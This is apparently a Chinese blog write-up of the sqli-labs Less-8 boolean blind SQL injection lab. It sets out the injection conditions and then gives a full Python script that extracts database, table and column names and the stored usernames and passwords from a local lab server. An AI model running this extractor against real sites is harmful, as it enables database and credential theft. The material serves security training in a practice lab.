2. 程式人生 > 實用技巧 >sqli-labs less-8(布林盲注)

sqli-labs less-8(布林盲注)

阿新 發佈:2020-12-08

less-8

布林盲注

首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+確定id的型別為單引號''包裹。然後進行盲注。

盲注思路:

  1. 破解當前資料庫名:

and length(database)=num 破解名字長度。

and ascii(substr(database(), 1,1))=num 猜出每一個字母的ascii碼。最後得到資料庫的名字。

  1. 破解所有資料庫名字

and (select count(*) from information_schema.schemata)=num判斷資料庫的個數。

and length((select schema_name from information_schema.schemata limit 0,1))=num判斷每一個數據庫的名字的長度。

and ascii(substr((select schema_name from information_schema.schemata limit 0,1)), 1,1)=num猜解每一個數據庫名字的每一個字母。最後得出資料庫的名字。

  1. 破解資料表和表中的欄位

具體操作語法和2中破解資料庫名字一樣,只是查詢的表變成了information_tables和information_columns

指令碼還是不太會寫,先py 學習ing...

payload:

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import requests
import re

class SQL_injection():
    def __init__(self, id, url, table_name='tables', db_name='information.schema',  *args):
        self.id = id
        self.url = url
        self.db_name = db_name
        self.table_name = table_name
        self.args = args

    # 訪問操作
    # 判斷檢索欄位返回值: 返回檢索欄位的數目
    # 盲注返回值: True返回1 False返回0
    def req(self, url, num):
        response = requests.get(url)
        # print(url)
        # print(response.text)
        result = re.search(r'color="#FFFF00">(.*?)<', response.text)
        # print(result)
        if result:
            if result.group(1) == "You are in...........":
                # print("連線正確")
                return num
            else:
                return 0
        else:
            return 0


    # 判斷欄位數目, 需要指定資料庫和資料表
    def column_num(self):
        num = 0
        for i in range(1, 100):
            new_url1 = self.url + self.id + " order by %s --+ " % (i)
            # print(new_url1)
            flag = self.req(new_url1, i)
            if flag:
                num = flag
                print("\r網頁搜尋的欄位數目為:%s" % flag, end="")
            if not flag:
                # print("xxx")
                break
        print()
        return num


    # 判斷當前資料庫名字
    def db_name1(self):
        length = 0
        for i in range(1,100):
            new_url = self.url + self.id + " and length(database())=%s  --+" % i
            flag = self.req(new_url, 1)
            if flag:
                length = i+1
                break

        if length == 0:
            print("資料庫名字長度獲取失敗.....")
            return 0
        print("\n正在使用的資料庫:", end='')
        for i in range(1, length):
            for k in range(95, 123):
                new_url = url + id + " and ascii(substr(database(), %s))=%s  --+" % (i, k)
                flag = self.req(new_url, 1)
                if flag:
                    print(chr(int(k)), end='')


    # 爆庫,列出所有資料庫名
    def db_list(self):
        length = 0
        # 爆出資料庫個數
        for i in range(1, 10000):
            new_url = self.url + self.id + " and (select count(schema_name) from information_schema.schemata)=%s --+ " % i
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("\n一共有%s個數據庫"%length)
                break

        # 一一爆出資料庫的名字
        # 遍歷每一行
        for i in range(0, length):
            # 求每一行資料庫名字的長度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select schema_name from information_schema.schemata limit %s, 1))=%s --+ " % (i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 資料庫名字的長度: %s          資料庫名:  "%(int(i+1), db_name_length), end='')

                    # 求資料庫名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select schema_name from information_schema.schemata limit %s,1), %s, 1)) =%s --+ " \
                                % (i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆表
    # 接受引數,網站連結,id, 指定資料庫的名字
    def table_name1(self):
        length = 0
        # 爆出某個資料庫中資料表個數
        if self.db_name:
            print("\n當前查詢的資料庫為 %s " % self.db_name)
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables where table_schema='%s')=%s --+ " % (self.db_name, i)
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("一共有%s張資料庫表" % length)
                    break

            # 一一爆出資料表的名字
            for i in range(0, length):
                # 求每一行資料庫名字的長度
                for l in range(1, 100):
                    # print(l)
                    new_url = url + id + " and length((select table_name from information_schema.tables where table_schema='%s' limit %s, 1))=%s --+ " % (self.db_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        print("%s. 資料表名字的長度: %s          資料表名:  "%(int(i+1), db_name_length), end='')

                        # 求資料庫名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(95, 123):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.db_name, i, db_l, k)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


        # 如果沒有指定資料庫,那麼則搜尋整個DBMS有多少張表
        else:
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables)=%s --+ " % i
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("\n一共有%s個數據庫表" % length)
                    break


    # 爆欄位
    def columns_name(self):
        length=0
        print("\n當前查詢的資料庫為 %s, 資料表為 %s " % (self.db_name, self.table_name))
        for i in range(1, 10000):
            new_url = url + id + " and (select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' )=%s --+ " % (
            self.db_name, self.table_name, i)
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("此表一共有%s個欄位" % length)
                break

        # 一一爆出資料欄位的名字
        for i in range(0, length):
            # 求每一個數據欄位名稱的長度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s, 1))=%s --+ " % (
                self.db_name, self.table_name, i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 資料表名字的長度: %s          資料表名:  " % (int(i + 1), db_name_length), end='')

                    # 求資料庫名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s,1), %s, 1)) =%s --+ " \
                                % (self.db_name, self.table_name, i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆值
    def value(self):
        # print(self.args)
        args_len = len(self.args)
        length = 0
        for arg_len in range(0, args_len):
            for i in range(1, 100000):
                new_url = url + id + " and (select count(%s) from %s.%s)=%s --+ " % (self.args[arg_len], self.db_name, self.table_name, i)
                # print(new_url)
                if self.req(new_url, 1):
                    print("欄位: %s --> %s  行" % (self.args[arg_len], i))
                    length = i
                    break

            # 求每一個欄位的所有值
            for i in range(0, length):
                # 求每一個值名稱的長度
                for l in range(1, 1000):
                    # print(l)
                    new_url = url + id + " and length((select %s from %s.%s limit %s, 1))=%s --+ " % (
                        self.args[arg_len], self.db_name, self.table_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        # print("%s. %s欄位長度: %s          值為:  " % (int(i + 1), args[arg_len], db_name_length), end='')
                        print("%s. %s :  " % (int(i + 1), self.args[arg_len]), end='')

                        # 求數值的名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(33, 127):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select %s from %s.%s limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.args[arg_len], self.db_name, self.table_name, i, db_l, k)
                                # print(new_url)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


if __name__ == "__main__":
    x = input("請輸入您要練習的less: ")
    url = "http://127.0.0.1:7788/sqli/Less-%s/?id=" % x
    id = input("請入id形式")

    # sql = SQL_injection(id, url, table_name, db_name, args)
    sql = SQL_injection(id, url, 'users', 'security', 'username', 'password')
    # 獲取當前使用的資料庫的名字
    sql.db_name1()

    # 列出所有資料庫的名字
    sql.db_list()

    # 列出指定資料庫彙總所有資料表, 若沒有指定資料庫,則只顯示有多少張表
    sql.table_name1()

    # 列指定表中所有的列
    sql.columns_name()

    # 列出指定欄位的值
    sql.value()

相關推薦

sqli-labs less-8(布林)

less-8 布林 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行

sqli-labs(62-65)-challenges-

62 130步內獲得flag-時間 130步!有點太小瞧我了吧(歪嘴) 1.?id=2 and 1=2顯示,不是數字型

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

BUUOJ | [CISCN2019 華北賽區 Day2 Web1]Hack World(SQL布林

題目地址 用瀏覽器連線靶機,看到以下頁面 右鍵檢視原始碼,發現上傳用的是 post 請求,根據提示知道 flag 位於 flag 表中的 flag 欄位裡

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

sqli-labs less 6

技術標籤:sqli-labsmysql安全 一、輸入id,回顯正常 127.0.0.1/sqli-labs-master/Less-6/?id=1

sqli-labs less 13

13關的話也沒有什麼特殊的,和十二關的順序啊payload啊一模一樣,不過13關的閉合方式是’),所以直接參考12就好了 12連結:

sqli-labs less 22 Future Editions

技術標籤:sqli-labsmysql安全 一、22關與上一關也是基本相同,只不過閉合方式不一樣,看一下程式碼,可以看到這裡是用雙引號進行閉合

sqli-labs less 23 GET -Error based - strip comments

技術標籤:sqli-labsmysql安全 一、輸入id,頁面正常顯示,然後輸入單引號報錯,添加註釋符後還是報錯,就讓人懷疑多了括號,試了還是沒用

sqli-labs less 25-a GET -Blind based -All your OR&AND belong to us -Intiger based

技術標籤:sqli-labs資料庫mysql安全 一、輸入id,新增單引號後或者雙引號後,顯示錯誤頁面,說明是整形閉合沒有閉合符號,之後也和25關沒有什麼區別

sql-lab 8-17 加post傳參

布林length() 函式 返回字串的長度?id=1\' and (length(database()))=8 -- qwesubstr() 擷取字串 (語法:SUBSTR(str,pos,len);) ?id=1\' and (ascii(substr(database(),1,1)))=115-- qwe 返回正常,說明資料庫

sqli-時間

目錄使用場景/條件時間用到的函式演示分析演示 使用場景/條件 沒有顯位/回顯,無法使用聯合/報錯,無法直接看到SQL語句執行的結果

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

sqli-labs 通關指南:Less 27、28

Less 27 和 Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。

sqli-labs 通關指南:Less 29、30、31

Less 29、30、31 都使用了 WAF 進行引數過濾,此處我們需要對 WAF 進行繞過再進行注入。可以使用 HPP 引數汙染攻擊,繞過 WAF 之後的注入過程和 Less 1 一樣。

sqli-labs 通關指南:Less 38 ~ 41

Less 38 ~ 41 雖然使用 Less 1 的方式注入即可注入成功,但是這 4 關存在堆疊注入漏洞。我們可以使用 “;” 閉合第一個 SQL 語句,然後在後面執行任意的 SQL 語句,通過這個漏洞我們可以對資料庫執行任意的操作。

END的學習 SQL注入繞過 and POST基於時間和布林

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

less-10 in sqli-labs

Less-10 延遲注入[ ” ] 先進行注入點的測試,發現試過很多回顯都是一樣的,當嘗試到?id=1\" and sleep(5) --+,發現頁面在遲緩後有回顯,猜測是基於\"的時間盲注註腳本和less-9基本一樣,改下url就行。

[CTF]基於布林的SQL

文章目錄 前言 [CTF學習]基於布林的SQL 一、題目 提  示: 基於布林的SQL 描  述: sql注入